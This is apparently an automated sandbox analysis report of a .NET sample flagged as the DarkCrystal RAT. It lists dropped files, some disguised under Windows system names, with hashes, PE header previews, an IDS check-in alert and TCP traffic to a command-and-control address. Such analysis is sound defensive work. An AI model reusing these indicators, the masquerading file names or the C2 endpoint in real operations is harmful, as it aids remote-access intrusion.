                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9777303084630145
                                                          Encrypted:false
                                                          SSDEEP:48:6LJPPt2M7Jt8Bs3FJsdcV4MKe27XdEoXvqBHCOulajfqXSfbNtm:+PlPc+Vx9MRXvkscjRzNt
                                                          MD5:28BBB28888F378FF7BF8C3828DDBC481
                                                          SHA1:B7938439325E26DADF5157297CDF2411945F3538
                                                          SHA-256:4E9E37F58D87DC4E0CDEE912704B6569B85238E210D0BA4AE443060E0714C462
                                                          SHA-512:EDB7418E48450AFCAF87CC4C98702A2296C483005BD2D97F13B6B8B9BAC95D05C5B5A69F1261DACEFAD230AB74600B8262D1B57B49141299136FF751A5632FE5
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y;.g.............................'... ...@....@.. ....................................@.................................x'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..P.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US. .......#GUID...0... ...#Blob...........WU........%3................................................................

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.862853408628296
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXPgjeQwYEQuXKvo5udX6vj:Vx993DEUoawYtSW8
                                                          MD5:976E574EE5FFF00C28C5AC670275D132
                                                          SHA1:0DE7CE5BE2660744C275C2923AA08810984586F8
                                                          SHA-256:FE867C17F4C9340B54F92D7AF9272C435185F54C1BF9EE933C1C436C085A8147
                                                          SHA-512:CFA534954D249DB1021343532A517754A85F5D0EE5A492751F652C3625E5DA75FFCCA12578A68E0BEF55D51C3E70533B9E68DA697C6A9C913D84FC719BF67E4F
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 20/10/2024 13:18:58..13:18:58, error: 0x80072746.13:19:03, error: 0x80072746.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):2.4574169294943817
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:9XHFe6y4Dj.exe
                                                          File size:16'272'384 bytes
                                                          MD5:8213a9c837181823a4d58728637eaeb5
                                                          SHA1:f574eec251d1695589c1e0e00ae167dfb39216ec
                                                          SHA256:68129b517bc27ae2ad742008a7deb67cc9c85209665f73c8fea955c52f1ef33e
                                                          SHA512:4b642f9d9b0f86cb83d2b7371baf00afec1a1475be85ccfae08794cb6978b6be2999bcaf6195351bcd446956f7639f71999ff182f932e3a0d66d935c5e832dac
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          TLSH:89F6F11AB5924F32D3B45B319567013E8290CB613262EB2F361F24C368677F19A779E3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................t8.........n.8.. ....8...@.. ........................8...........@................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x78936e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x670CF099 [Mon Oct 14 10:21:13 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3893200x4b.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x38a0000x320.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x38c0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x3873740x387400cabff5e50568872017e4754380ead009unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x38a0000x3200x400d5d56b53a3d8bd8ef3235020baab9faeFalse0.353515625data2.6517752881589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .reloc0x38c0000xc0x20087beb7d42148ad16a8f15f0d74096e16False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x38a0580x2c8data0.46207865168539325

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-20T18:17:54.870250+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549772188.114.96.380TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 20, 2024 18:17:53.971879959 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:53.976728916 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:53.976804018 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:53.977781057 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:53.982786894 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:54.325443029 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:54.330399990 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:54.763739109 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:54.870249987 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:55.183435917 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:55.183458090 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:55.183505058 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:55.371898890 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:55.539942980 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:55.776500940 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:56.413966894 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.414000034 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.414037943 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.414108992 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:56.414474010 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:56.422144890 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.576639891 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.667109966 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:56.760993004 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:56.766159058 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.766170979 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.766182899 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.797019958 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.908417940 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.174182892 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.175852060 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.179810047 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.179987907 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.180866957 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.180953979 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.181180000 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.186233997 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.217400074 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.354612112 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.527158976 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.532215118 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.533436060 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.586172104 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.667115927 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.756182909 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.757075071 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.761414051 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.761466980 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.762006998 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.762065887 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.762398958 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.767174959 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.956057072 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.120415926 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.125926018 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.125937939 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.125946045 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.167123079 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.169543028 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.169701099 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.321239948 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.463969946 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.547938108 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.667720079 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.956697941 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:59.167071104 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.147286892 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.147411108 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.148114920 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.152780056 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.153321981 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.153357029 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.153446913 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.153618097 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.154350996 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.154689074 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.161298990 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.175050020 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.179837942 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.180314064 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.180314064 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.185210943 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.511051893 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.515919924 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515930891 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515950918 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515959024 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515966892 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516000032 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516007900 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516036034 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516105890 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516114950 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516143084 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516144037 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516293049 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516318083 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516625881 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521069050 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521079063 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521086931 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521095037 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521105051 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521114111 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521145105 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521219969 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521830082 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521989107 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.526529074 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.531411886 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.531431913 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.531440973 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.573559046 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.573721886 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.621557951 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.621686935 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.669600964 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.669687033 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.719089985 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.719239950 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.769481897 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.769746065 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.787657022 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.787854910 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.792948961 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.792959929 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793132067 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793142080 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793148994 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793158054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793174982 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793184996 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793219090 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793229103 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793287039 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793344975 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793406010 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793415070 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793425083 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793451071 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793512106 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793520927 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793529987 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793565989 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793613911 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793622971 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793680906 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793690920 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793745995 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793755054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793831110 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793839931 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793869019 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793915033 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793981075 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793991089 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794044018 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794059992 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794078112 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794086933 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794169903 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794249058 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794296026 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794305086 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794368982 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794378042 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794439077 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794447899 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794488907 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794497967 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794547081 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794559002 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794627905 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794637918 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794728041 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794738054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.848901987 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.853883982 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.853990078 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.854279995 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.859210968 CEST8049805188.114.96.3192.168.2.5
